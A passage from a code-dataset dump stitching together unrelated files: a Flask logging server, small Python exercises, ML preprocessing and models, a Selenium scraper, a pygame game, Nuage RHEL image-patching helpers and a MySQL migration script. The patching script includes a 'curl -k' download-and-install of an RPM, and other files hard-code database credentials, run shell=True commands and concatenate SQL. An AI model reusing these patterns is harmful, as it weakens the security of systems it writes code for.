{}\".format(repo, path_and_class))\n path = \"/\".join(path_and_class.split(\"/\")[:-1])\n class_ = path_and_class.split(\"/\")[-1]\n pipe = subprocess.Popen(\n [\n \"java\",\n \"-cp\", \"libs/*:\" + repo + \"/\" + path,\n class_,\n \"../dimple.json\"\n ],\n cwd=\"build\"\n )\n write_log(\"Running samples: pid={}\".format(pipe.pid))\n pid = pipe.wait()\n write_log(\"Finished writing samples: returncode={}\".format(pipe.returncode))\n return \"Good work\"\n\n\n@app.route('/debug', methods=[\"GET\", \"PUT\", \"POST\", \"DELETE\"])\ndef debug():\n app.logger.debug(request.headers)\n app.logger.debug(request.args)\n app.logger.debug(request.data)\n return ''.join([\n pprint.pformat(request.headers),\n #pprint.pformat(request.body)\n ])\n\n\ndef write_log(message):\n app.logger.debug(\"JSON log: {}\".format(message))\n json_message = {\n \"timestamp\": str(datetime.datetime.now()),\n \"message\": message\n }\n LOG_LOCK.acquire(True)\n try:\n log_file = open(\"log.json\", \"a\")\n log_file.write(json.dumps(json_message))\n log_file.write(\"\\n\")\n log_file.close()\n finally:\n LOG_LOCK.release()\n\n\ndef follow(file_):\n lineCount = 0\n file_.seek(0, 2)\n while True:\n line = file_.readline()\n try:\n data = json.loads(line)\n data['i'] = lineCount\n lineCount += 1\n yield json.dumps(data)\n except ValueError:\n time.sleep(0.1)\n continue\n\n\ndef batch_follow(file_, limit=None):\n lineCount = 0\n file_.seek(0, 2)\n prev_line = \"\"\n while True:\n lines = []\n done = False\n while not done and limit is not None and len(lines) < limit:\n try:\n line = prev_line + file_.readline()\n data = json.loads(line)\n #app.logger.debug(\"{}: {}\".format(lineCount, line))\n data['i'] = lineCount\n lineCount += 1\n lines.append(data)\n #prev_line = \"\"\n #line = file_.readline()\n except ValueError:\n #prev_line = line\n done = True\n if len(lines) > 0:\n yield json.dumps(lines)\n lines = []\n time.sleep(0.1)\n\n\ndef tail(file_, limit=10):\n lines = file_.readlines()\n app.logger.debug(lines[-limit:])\n for line in lines[-limit:]:\n try:\n json.loads(line)\n yield line\n except ValueError:\n continue\n\n\n@sockets.route('/watch_log')\ndef watch_log(ws):\n write_log(\"Starting to watch log\")\n\n log_file = open(\"log.json\", \"r\")\n\n # First, return the latest 10 entries\n for sample in tail(log_file, 10):\n ws.send(sample)\n\n # Second, start returning real-time\n for sample in follow(log_file):\n ws.send(sample)\n\n\n@app.route('/ping_log')\ndef ping_log():\n write_log(\"PING\")\n return \"Done\"\n\n\n@app.route('/git-push', methods=[\"POST\"])\ndef git_push():\n repo_name = request.json['repository']['name']\n write_log(\"Github PUSH event: {}\".format(repo_name))\n repo = git.Repo(os.path.join(\"repos\", repo_name))\n origin = repo.remotes.origin\n origin.pull()\n write_log(\"Updated {} to commit={}\".format(\n repo_name,\n origin.refs.HEAD.ref.object.hexsha))\n return \"Hi Github\"\n\n\n@sockets.route('/sampler')\ndef batch_sample(ws):\n sample_file = open(\"dimple.json\", \"a\")\n sample_file.close();\n\n sample_file = open(\"dimple.json\", \"r\")\n for samples in batch_follow(sample_file, limit=10):\n ws.send(samples)\n #for samples in batch_follow(file(\"samples\"), limit=10):\n # ws.send(samples)\n\n\n@app.route('/monitor')\ndef monitor():\n return \"Base monitor\"\n\n\n@app.route('/monitor/')\ndef monitor_repo(repo):\n return \"Monitoring {}\".format(repo)\n\n\n@app.route('/monitor//')\ndef monitor_repo_commit(repo, commit):\n return \"Monitoring {}, commit={}\".format(repo, commit)\n\n\n@app.route('/monitor///')\ndef monitor_repo_commit_model(repo, commit, model):\n return \"Monitoring {}, commit={}, model={}\".format(repo, commit, model)\n\n\n@app.route('/monitor//')\ndef monitor_repo_model(repo, model):\n return \"Monitoring {}, model={}\".format(repo, model)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"385763285","text":"\"\"\"\r\n\n\nIn colour theory, colour _harmony_ refers to an aesthetically pleasing\ncombination of colours. The standard colour wheel shows the 12 primary,\nsecondary and tertiary colours. Starting with _red_ , and moving clockwise,\nthe colours are:\n\n colours = [\"red\", \"red-orange\", \"orange\", \"yellow-orange\", \"yellow\", \"yellow-green\", \"green\", \"blue-green\", \"blue\", \"blue-violet\", \"violet\", \"red-violet\"]\n\nWith an initial colour (called the **anchor** ), you can find combinations of\nharmonious colours. The combination types are shown below, for an anchor\ncolour of _green_ :\n\n![Image of Colour Combinations](https://edabit-\nchallenges.s3.amazonaws.com/colour_harmony.png)\n\nGiven an anchor colour and a combination type, write a function that returns a\n_set_ containing all colours within the combination.\n\n### Examples\n\n colour_harmony(\"green\", \"triadic\") ➞ { \"green\", \"violet\", \"orange\" }\n \n colour_harmony(\"blue-green\", \"complementary\") ➞ { \"blue-green\", \"red-orange\" }\n \n colour_harmony(\"orange\", \"analogous\") ➞ { \"yellow-orange\", \"red-orange\", \"orange\" }\n\n### Notes\n\n * Create the combinations given their relative positions from the anchor colour. For example, the rectangle combination starts with the colours two positions clockwise and four positions anti-clockwise from the anchor (and not the other way around). With the split-complemetary combination, you take the colours five positions both clockwise and anti-clockwise from the anchor. For the analogous combination, you include the colours directly on either side of the anchor.\n * Include the anchor colour in the final set.\n\n\"\"\"\r\n\ndef colour_harmony(anchor,scheme):\n final = []\n colours = [\"red\", \"red-orange\", \"orange\", \"yellow-orange\", \"yellow\", \"yellow-green\", \"green\", \"blue-green\", \"blue\", \"blue-violet\", \"violet\", \"red-violet\"]\n dictionary = {\"complementary\": [0,6],\n \"analogous\": [-1,0,1],\n \"triadic\": [4,0,-4],\n \"split_complementary\": [5,0,-5],\n \"rectangle\": [2,6,8,0],\n \"square\": [0,3,6,9]\n }\n \n loop = dictionary[scheme]\n \n for item in loop:\n \n anchor_position = colours.index(anchor)\n \n if item == 0:\n final.append(colours[anchor_position])\n \n if item != 0:\n to_append = anchor_position + item\n if to_append > 11:\n final_append = to_append - 12\n final.append(colours[final_append])\n if to_append < 0:\n final_append = 12 + to_append\n final.append(colours[final_append])\n \n if to_append >= 0 and to_append <= 11:\n final.append(colours[to_append])\n return set(final)\n\n","sub_path":"md4AF8HwJrhrhA5zm_16.py","file_name":"md4AF8HwJrhrhA5zm_16.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"294182734","text":"import os\nimport sys\nimport argparse\nimport random\nimport numpy as np\nimport pandas as pd\nimport feature_extraction as fe\nfrom sklearn.model_selection import train_test_split\n\n# W:anger, L:boredom, E:disgust, A:fear, F:happiness, T:sadness, N:neutral\nemo_label_ber = {'W': 0, 'L': 1, 'E': 2, 'A': 3, 'F': 4, 'T': 5, 'N': 6}\ngender_label = {'03': 0, '08': 1, '09': 1, '10': 0, '11': 0, '12': 0, '13': 1, '14': 1, '15': 0, '16': 1}\noutput_path = '../db'\n\ndef csv_dataset(dataset, output, pick=(0, 0, 0, 1, 1), \n win_ms=0.025, overlap=0.015, mode=0, preemp=0.97):\n dbpath = ''\n if dataset == 'Berlin':\n dbpath = '../db/berdb/'\n else:\n dbpath = '../db/ravdb_normal/'\n files = os.listdir(dbpath)\n labels = fe.allLabels(pick = pick)\n file_name = []\n emo_labels = []\n gen_labels = []\n result = []\n for fn in range(len(files)):\n frames = fe.Signal(dbpath + files[fn], win_ms, overlap, mode, preemp)\n features = frames.pickFeatures(pick)\n result.append(features)\n if dataset == 'Berlin':\n emo_labels.append(emo_label_ber[filter(lambda x: x.isupper(), files[fn])])\n gen_labels.append(gender_label[files[fn][:2]])\n else:\n emo_labels.append(int(files[fn].split('.')[0].split('-')[2]))\n gen_labels.append(0 if int(files[fn].split('.')[0].split('-')[-1]) & 1 else 1)\n file_name.append(files[fn])\n \n result = np.asarray(result)\n result = pd.DataFrame(result, columns = labels)\n result['emotion'] = emo_labels\n result['gender'] = gen_labels\n result['file'] = file_name\n\n result.to_csv(output, sep = ',', encoding = 'utf-8') \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--dataset', required=True, help='input dataset(Berlin or RAV)')\n parser.add_argument('-o', '--output', required=True, help='output file')\n parser.add_argument('-f', '--features', help='feature selection')\n args =vars(parser.parse_args())\n dataset = str(args['dataset'])\n if dataset not in ('Berlin', 'RAV'):\n Exception('Wrong dataset! Please input Berlin or RAV!')\n output_name = str(args['output'])\n pick = (0, 0, 0, 1, 1)\n if args['features'] != None:\n pick = tuple([int(i) for i in list(args['features'])])\n csv_dataset(dataset, os.path.join(output_path, output_name + '.csv'), pick) \n\n","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"601027133","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.exceptions import CloseSpider\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport csv\nfrom selenium.webdriver.support.ui import Select\nfrom .. import settings\nfrom selenium.common.exceptions import NoSuchElementException\nfrom scrapy.http import Request\nfrom scrapy.selector import HtmlXPathSelector\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom pathlib import Path\nfrom datetime import datetime\n\n \nclass ScraperSpider(CrawlSpider):\n name = 'scraper'\n allowed_domains = ['www.greatplacetowork.com']\n search_url = 'https://www.greatplacetowork.com/forallsummit/speakers'\n start_urls = ['https://www.greatplacetowork.com/forallsummit/speakers']\n short_sleep=4\n medium_sleep=5\n long_sleep=10\n\n\n def parse(self, response):\n url = \"https://www.greatplacetowork.com/forallsummit/speakers\"\n chromedriver_path=\"C:/chromedriver\"\n chrome_options = webdriver.ChromeOptions()\n partial_url=\"213129/agenda/speakers/\"\n\n current_directory=str(Path(__file__).parent.parent.absolute())\n csv_dir=current_directory+\"/data/\"\n Path(csv_dir).mkdir(parents=True,exist_ok=True)\n #prefs = {\"download.default_directory\": path }\n #chrome_options.add_experimental_option('prefs',prefs)\n #chrome_options.add_argument('--headless')\n #chrome_options.add_argument('window-size=1024x768')\n #chrome_options.add_argument(\"disable-gpu\")\n #chrome_options.add_argument('--no-sandbox')\n #chrome_options.add_argument('--disable-dev-shm-usage')\n chrome_options.add_argument(\"--start-maximized\")\n #print(current_directory)\n\n #exec(open(current_directory+ '/'+'pdf_extraction.py').read())\n\n\n\n\n\n browser = webdriver.Chrome(chromedriver_path,chrome_options=chrome_options)\n \n browser.get(url)\n browser.get_cookies()\n sleep(self.medium_sleep)\n \n iframe=browser.find_element_by_tag_name('iframe')\n src_iframe=iframe.get_attribute(\"src\")\n browser.get(src_iframe)\n browser.get_cookies()\n \n sleep(self.short_sleep)\n anchors=browser.find_elements_by_tag_name('a')\n list_urls=[]\n for url in anchors:\n href=url.get_attribute('href')\n if(href):\n list_urls.append(href)\n\n\n asserts_urls=[]\n for url in list_urls:\n if partial_url in url:\n asserts_urls.append(url)\n\n with open( csv_dir +\"data\"+\".csv\", \"w\") as csvFile:\n csv_output = csv.writer(csvFile)\n csv_output.writerow([\"URLS with pattern {}\".format(partial_url)])\n for url in asserts_urls:\n csv_output.writerow([url])\n browser.close()\n\n\n\n\n\n\n \n\n\n","sub_path":"webScrapy/webScrapy/spiders/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"68727274","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 1 16:23:31 2019\n\n@author: zhouqiu\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom reader1D import Reader\n\nX_reader = Reader('train_noise4.txt', message_size=91,\n batch_size=1, sample_num=500, name='X')\nY_reader = Reader('train_smooth.txt', message_size=91,\n batch_size=1, sample_num=500, name='Y')\ntest_X_reader = Reader('test_noise4.txt', message_size=91,\n batch_size=1, sample_num=50, name='Y')\nX_array = X_reader.getData()/15\nY_array = Y_reader.getData()/15\ntest_X_array = test_X_reader.getData()/15\n#print(X_array.shape)\n\nmodel = keras.Sequential([\n #keras.layers.Flatten(input_shape=(91)),\n #keras.layers.Input(shape=(91,)),\n keras.layers.Dense(128, activation=tf.nn.relu),\n # keras.layers.Conv1D(filters=32, kernel_size=4, strides=2, padding='VALID'),\n # keras.layers.Conv1D(filters=64, kernel_size=7, strides=2, padding='VALID'),\n # keras.layers.Dense(128, input_shape=(91,), activation=tf.nn.relu),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(128, activation=tf.nn.relu),\n # keras.layers.UpSampling1D(size=2),\n # keras.layers.UpSampling1D(size=2),\n keras.layers.Dense(91, activation=tf.nn.relu)\n])\n\nmodel.compile(optimizer=tf.train.AdamOptimizer(), \n loss=tf.keras.losses.MeanSquaredError(),\n metrics=['mse'])\n\nmodel.fit(X_array, Y_array, epochs=50)\nprint(X_array.shape)\noutput_array = model.predict(test_X_array)\nprint(output_array.shape)\n\nf = open('output_array_Dense_relu.txt', 'w') # 清空文件内容再写\nfor i in range(output_array.shape[0]):\n for j in range(output_array.shape[1]):\n f.write(str(output_array[i][j]*15))\n f.write(' ')\n f.write('\\n')\n# f.write('aaa') #只能写字符串\n# f.write('\\n')\n# f.writelines(['123','\\n', 'bbb','\\n']) #可写所有能迭代的类型,例如list\n# f.writelines(('456','\\n', 'ccc')) #例如tuple\nf.close()","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"127136870","text":"from django.shortcuts import render\nfrom django.utils import translation\nfrom django.contrib.auth.decorators import login_required\nfrom apps.company_user.models import CompanyUser\n\n\n@login_required\ndef home(request):\n data = {}\n data['usuario'] = request.user\n return render(request, 'core/index.html', data)\n\n\n@login_required\ndef home_en(request):\n data = {}\n data['usuario'] = request.user\n translation.activate(\"en\")\n return render(request, 'core/index.html', data)\n\n\n@login_required\ndef home_pt(request):\n data = {}\n data['usuario'] = request.user\n translation.activate(\"pt\")\n return render(request, 'core/index.html', data)\n","sub_path":"apps/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"319354035","text":"import pygame\nfrom pygame.sprite import Group\n\nimport game_functions as gf\nfrom corgi import Corgi\nfrom game_stats import GameStats\nfrom scoreboard import Scoreboard\nfrom button import Button\nfrom logo import Logo\nfrom settings import Settings\n\n\ndef run_game():\n \"\"\"Run the game\n ...\n This function starts the game. It initializes pygame, instantiates the\n screen, play button, stats, scoreboard, corgi, borks, kitties and an army\n thereof. It then starts the main loop which updates the screen and checks\n for events. When the game is active, it also updates the corgi, the borks\n and the kitties.\"\"\"\n pygame.init()\n settings = Settings()\n\n screen = pygame.display.set_mode(\n (settings.screen_width, settings.screen_height))\n pygame.display.set_caption(settings.caption)\n\n logo = Logo(settings, screen)\n play_button = Button(screen, settings, settings.play_button_text)\n stats = GameStats(settings)\n scoreboard = Scoreboard(settings, screen, stats)\n corgi = Corgi(settings, screen)\n borks = Group()\n kitties = Group()\n\n gf.create_army(settings, screen, corgi, kitties)\n\n # game loop\n while True:\n gf.update_screen(settings, screen, stats,\n scoreboard, corgi, kitties, borks, play_button, logo)\n gf.check_events(settings, screen, stats,\n scoreboard, play_button, kitties, corgi, borks)\n\n if stats.game_active:\n corgi.update()\n gf.update_borks(settings, screen, stats,\n scoreboard, corgi, kitties, borks)\n gf.update_kitties(settings, stats, screen,\n scoreboard, corgi, kitties, borks)\n\n\nrun_game()\n","sub_path":"invaders.py","file_name":"invaders.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"294569448","text":"# !/usr/bin/python\n# Copyright 2019 NOKIA\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,\n# either express or implied. See the License for the specific\n# language governing permissions and limitations under the License.\n\nimport subprocess\nimport sys\nimport logging\nimport os\nimport constants\n\n\nlogger = logging.getLogger(constants.LOG_FILE_NAME)\n\n\n#####\n# Function to run commands on the console\n#####\n# quotes\ndef cmds_run(cmds):\n if not cmds:\n return\n output_list = []\n for cmd in cmds:\n proc = subprocess.Popen(\n cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n shell=True,\n close_fds=True)\n (out, err) = proc.communicate()\n if err and err.split():\n logger.error(\n \"error occurred during command:\\n %s\\n error:\\n %s \\n \"\n \"exiting\" % (cmd, err))\n sys.exit(1)\n output_list.append(out)\n\n if len(cmds) == 1:\n if output_list[0]:\n logger.debug(\"%s\" % output_list[0])\n return output_list[0]\n else:\n if output_list:\n logger.debug(\"%s\" % output_list)\n return output_list\n\n\ndef virt_customize(command):\n return cmds_run(\n [constants.VIRT_CUSTOMIZE_ENV + 'virt-customize '\n '--run-command %s' %\n command])\n\n\ndef virt_customize_run(command):\n return cmds_run([constants.VIRT_CUSTOMIZE_ENV + 'virt-customize '\n '--run %s' %\n command])\n\n\ndef virt_copy(command):\n return cmds_run([constants.VIRT_CUSTOMIZE_ENV + 'virt-copy-in '\n '-a %s' % command])\n\n\n#####\n# Check if the provided path to the file exists\n#####\n\n\ndef file_exists(filename):\n if os.path.isfile(filename):\n return True\n else:\n logger.error(\"%s is not present in the location of this \"\n \"script\" % filename)\n sys.exit(1)\n\n\n#####\n# Function to add RHEL subscription using guestfish\n#####\n\n\ndef start_script():\n if os.path.isfile(constants.SCRIPT_NAME):\n os.remove(constants.SCRIPT_NAME)\n\n cmds = '''#!/bin/bash\nset -xe\n'''\n write_to_file(constants.SCRIPT_NAME, cmds)\n\n\n#####\n# Function that writes commands to a file\n#####\n\ndef write_to_file(filename, contents):\n with open(filename, 'a') as script:\n script.writelines(contents)\n\n#####\n# Importing Gpgkeys to Overcloud image\n#####\n\n\ndef importing_gpgkeys(image, gpgkeys):\n cmd = '''\n#### Importing GPG keys\n'''\n write_to_file(constants.SCRIPT_NAME, cmd)\n for gpgkey in gpgkeys:\n file_exist = os.path.isfile(gpgkey)\n file_name = os.path.basename(gpgkey)\n if file_exist:\n virt_copy('%s %s %s' % (image, gpgkey,\n constants.TEMPORARY_PATH))\n rpm_import = '''\nrpm --import %s%s\n''' % (constants.TEMPORARY_PATH, file_name)\n write_to_file(constants.SCRIPT_NAME, rpm_import)\n\n else:\n logger.error(\"Nuage package signing key is not present \"\n \"in %s ,\"\n \"Installation cannot proceed. Please place \"\n \"the \"\n \"signing key in the correct location and\"\n \" retry\" %\n gpgkey)\n\n sys.exit(1)\n\n\n####\n# Copying repo file to overcloud image\n####\n\n\ndef copy_repo_file(image, repofile):\n if os.path.isfile(repofile):\n virt_copy('%s %s /etc/yum.repos.d/' % (image, repofile))\n else:\n logger.error(\"Repo file doesn't exists at %s\"\n \"Please provide the correct path of RepoFile\" %\n repofile)\n sys.exit(1)\n\n\n#####\n# Function to add RHEL subscription using guestfish\n#####\n\n\ndef rhel_subscription(username, password, pool, satellite_url, satellite_org,\n satellite_key, proxy_hostname, proxy_port,\n rhel_sub_type):\n subscription_command = ''\n if proxy_hostname and proxy_port:\n subscription_command += (\n \"subscription-manager config\"\n \" --server.proxy_hostname=%s \"\n \" --server.proxy_port=%s\\n\"\n % (proxy_hostname, proxy_port)\n )\n # this does not allow multiple runs of the patching script\n if rhel_sub_type == constants.RHEL_SUB_SATELLITE:\n subscription_command += (\n \"hostname nuage-patching\\n\"\n \"sudo curl -k %(0)s/pub/katello-ca-consumer-latest.noarch.rpm -o \"\n \"%(1)skatello-ca-consumer-latest.noarch.rpm\\n\"\n \"sudo rpm -Uvh %(1)skatello-ca-consumer-latest.noarch.rpm\\n\"\n \"rm -rf %(1)skatello-ca-consumer-latest.noarch.rpm\\n\"\n % {'0': satellite_url, '1': constants.TEMPORARY_PATH}\n )\n subscription_command += (\n \"subscription-manager register\"\n \" --org='%s' --activationkey='%s'\\n\" %\n (satellite_org, satellite_key)\n )\n else:\n subscription_command += (\n \"subscription-manager register\"\n \" --username='%s' --password='%s'\\n\" % (username, password)\n )\n subscription_command += (\n \"subscription-manager attach --pool='%s'\\n\" % pool\n )\n subscription_command += (\n \"subscription-manager repos --enable=rhel-7-server-optional-rpms\\n\"\n \"subscription-manager repos --enable=rhel-7-server-rpms\\n\"\n )\n write_to_file(constants.SCRIPT_NAME, subscription_command)\n\n\n#####\n# Function to remove the RHEL subscription\n#####\n\n\ndef rhel_remove_subscription(rhel_sub_type=None):\n cmd = '''\n#### Removing RHEL Subscription\nsubscription-manager unregister\n'''\n if rhel_sub_type == constants.RHEL_SUB_SATELLITE:\n cmd += (\n \"rpm -qa\"\n \"| grep katello-ca-consumer\"\n \"| xargs sudo rpm -e\"\n )\n write_to_file(constants.SCRIPT_NAME, cmd)\n\n#####\n# Function to install packages nuage python ovs\n#####\n\n\ndef install_nuage_python_ovs_packages():\n cmd = '''\n#### Install Nuage Python OpenvSwitch\nyum install --setopt=skip_missing_names_on_install=False -y %s\nyum clean all\n''' % constants.NUAGE_PYTHON_OVS\n write_to_file(constants.SCRIPT_NAME, cmd)\n\n#####\n# Function to remove packages that are not needed\n#####\n\n\ndef uninstall_packages():\n cmd = '''\n#### Removing Upstream OpenvSwitch\novs_package_name=$(rpm -qa | awk -F- \\\n'/^(openvswitch[0-9]+\\.[0-9]+-|openvswitch-2)/{print $1}')\nyum remove -y $ovs_package_name\nyum clean all\n'''\n write_to_file(constants.SCRIPT_NAME, cmd)\n","sub_path":"image-patching/nuage_image_patching_scripts/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"316745834","text":"from collections import Counter\nfrom tqdm import tqdm\nimport pickle\n\n\ndef read_txt_file(file_path):\n with open(file_path, 'r', encoding='utf-8') as f:\n data = f.readlines()\n data = [d[:-1] for d in data]\n return data\n\n\ndef count_dataset(data):\n results = Counter()\n for d in tqdm(data):\n results += Counter(d)\n return results\n\n\ndef Convert_word_to_ids(word_list, data):\n result = []\n for l in tqdm(data):\n tmp = [word_list.index('SOS')]\n for w in l:\n if w in word_list:\n tmp.append(word_list.index(w))\n else:\n tmp.append(word_list.index('UNK'))\n tmp.append(word_list.index('EOS'))\n result.append(tmp)\n return result\n\n\ndef Padding_Cutting(data, max_len):\n result = [l[:max_len] for l in data]\n result_len = [len(l) for l in result]\n result = [l+[word_list.index('PAD')]*(max_len-len(l)) if len(l)threshold]\n word_list = ['PAD', 'SOS', 'EOS', 'UNK'] + [x[0] for x in word_list]\n\n result_datas = dict()\n for f_n in file_list:\n print(f_n, 'Convert_word_to_ids')\n data = Convert_word_to_ids(word_list, dataset[f_n])\n data, data_len = Padding_Cutting(data, 28)\n result_datas[f_n] = {'data': data, 'data_len': data_len}\n \n with open('./'+'dataset_%s.pk' % (threshold), 'wb') as f:\n pickle.dump(result_datas, f)\n with open('./'+'word_list_%s.txt' % (threshold), 'w', encoding='utf-8') as f:\n f.writelines([w+'\\n' for w in word_list])\n print(1)\n","sub_path":"YesorNoIdentify/SI_dataset_process/get_wordlist_convert2id.py","file_name":"get_wordlist_convert2id.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"202111839","text":"def pancake_sort(arr):\n og_arr = list(reversed(sorted(arr)))\n arr_len = len(arr) - 1\n flips = []\n i = 0\n for i in range(arr_len):\n if arr == og_arr:\n break\n max_i = arr.index(max(arr[i:]))\n # if max_i != i:\n if max_i != arr_len:\n flips.append(max_i + 1)\n arr[max_i:] = reversed(arr[max_i:])\n flips.append(i + 1)\n arr[i:] = reversed(arr[i:])\n # print(og_arr == arr)\n flips.append(0)\n # print(arr)\n return flips\n\n\nif __name__ == '__main__':\n import sys\n arrays = []\n try:\n for line in sys.stdin:\n arrays.append([int(e) for e in line.split(' ') if e])\n except TypeError as e:\n print(e)\n sys.exit()\n del arrays[-1] # remove the pesky 0 at the end\n for array in arrays:\n print(' '.join((str(e) for e in array)))\n print(' '.join((str(n) for n in pancake_sort(array))))\n print(0)\n","sub_path":"pancake_flip/poor_pancake_sort.py","file_name":"poor_pancake_sort.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"555943600","text":"#!/usr/bin/python\n#you can execute this script with the 'python document.py' command\n#first you want to map the table that you want to write to ('document' by default) then ensure that you uncomment the lines near the bottom to insert the data into the tbale\n\nimport MySQLdb\nimport time\nfrom time import gmtime, strftime\n\ntableName = 'transaction'\n# Open database connection\ndb = MySQLdb.connect(\"127.0.0.1\",\"root\",\"root\",\"latipay\" )\n\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\ncursor2 = db.cursor()\ncursor.execute(\"SELECT code FROM latipay.merchant_base;\")\n#generate a list of all merchants in the DB\nmerchants = list(cursor.fetchall())\n\napiQuery = \"SELECT order_id, create_date, gateway_type, receive_amount, item_name, payer_merchant_code, merchant_code, id_number, choose_currency FROM latipay.transaction_order WHERE merchant_code=\"\n#get id_number for each merchant_id\nfor merchant_code in merchants:\n merchant_code = merchant_code[0]\n merchant_code = \"'\" + merchant_code + \"'\"\n cursor2.execute(apiQuery + merchant_code +';')\n trans_info = cursor2.fetchone()\n if trans_info is not None and trans_info[1] != '' and trans_info[1] is not None:\n\n transaction_id = trans_info[0]\n amount = trans_info[3]\n payment_method = trans_info[2]\n if trans_info[1] is not None and trans_info[1] != '':\n create_date = time.strftime(\"%Y:%m:%d\")\n else: create_date = trans_info[1]\n\n product_type = trans_info[4]\n payer_id = trans_info[5]\n\n organisation_id = trans_info[6]\n user_id = trans_info[7]\n currency = trans_info[8]\n type = 'api'\n\n\n # insert1 = \"INSERT INTO\" + tableName + \"(transaction_id, amount, payment_method, create_date, product_type, payer_id, organisation_id, user_id, currency, type) VALUES (\"\n # insert2 = transaction_id + ',' + amount + ',' + payment_method + ',' + create_date + ',' + product_type + ',' + payer_id + ',' + organisation_id + ',' + user_id + ',' + currency + ',' + type\");\"\n # insertQuery = insert1 + insert2\n # insertCursor = db.cursor()\n # insertCursor.execute(insertQuery)\n # db.commit()\n\nprint ('success!')\n\n# disconnect from server\ndb.close()\n","sub_path":"migrationScripts/transaction_api.py","file_name":"transaction_api.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"59529774","text":"'''sql语句参数化'''\nimport pymysql\n\ndb = pymysql.connect(host=\"localhost\",\n user=\"root\",\n password=\"123456\",\n database=\"db5\",\n charset=\"utf8\",\n port=3306)\ncur = db.cursor()\n# 接收用户从终端的输入\nsid = input(\"请输入ID号:\")\nsname = input(\"请输入姓名:\")\nsscore= input(\"请输入成绩:\")\n# 定义sql命令的变量\n# '%s'占位,后用 %()补位,此方法不推荐\n# ins = \"insert into t1 values('%s','%s','%s')\" % (sid,sname,sscore)\nins = 'insert into t1 values(%s,%s,%s)'\nL = [sid,sname,sscore]\ntry:\n # 必须用列表进行传参,execute的第2个参数\n cur.execute(ins,L)\n db.commit()\n print(\"ok\")\nexcept Exception as e:\n db.rollback()\n print(\"Failed\",e)\n\ncur.close()\ndb.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"mysql/day05/mysql/04_SQL语句参数化.py","file_name":"04_SQL语句参数化.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"496916180","text":"import pandas as pd\nimport numpy as np\nfrom decim.fmri_workflow import BehavDataframe as fa\nfrom collections import defaultdict\n\n\nclass Choiceframe(object):\n\n def __init__(self, subject, session, run, flex_dir, BehavFrame, PupilFrame, BrainstemRois):\n '''\n Initialize\n '''\n self.subject = subject\n self.session = session\n self.run = run\n self.flex_dir = flex_dir\n BehavFrame.onset = BehavFrame.onset.astype(float)\n BehavFrame = BehavFrame.sort_values(by='onset')\n self.BehavFrame = BehavFrame\n self.PupilFrame = PupilFrame\n self.BrainstemRois = BrainstemRois\n\n def choice_behavior(self):\n df = self.BehavFrame\n switches = pd.DataFrame({'onset': df.loc[df.switch != 0].onset.values,\n 'direction': df.loc[df.switch != 0].switch.values,\n 'switch_index': df.loc[df.switch != 0].index.values})\n self.switch_behavior = switches\n\n def points(self):\n '''\n Add belief values of 11 surrounding samples to later find true switches\n '''\n df = self.BehavFrame\n points = df.loc[(df.event == 'GL_TRIAL_LOCATION')].reset_index()\n p = []\n for i, row in self.switch_behavior.iterrows():\n switch_point = points.loc[points['index'] == row.switch_index].index[0]\n if switch_point < 5:\n trial_points = points.iloc[0:switch_point + 6]\n p.append(np.append(np.zeros(11 - len(trial_points)), trial_points.belief.values))\n else:\n trial_points = points.iloc[switch_point - 5:switch_point + 6]\n p.append(trial_points.belief.values)\n self.point_kernels = pd.DataFrame(p)\n\n def choice_pupil(self, artifact_threshhold=.2, tw=4500):\n '''\n Takes existing pupilframe and makes choicepupil frame.\n If there is no existing pupilframe, a new one is created.\n 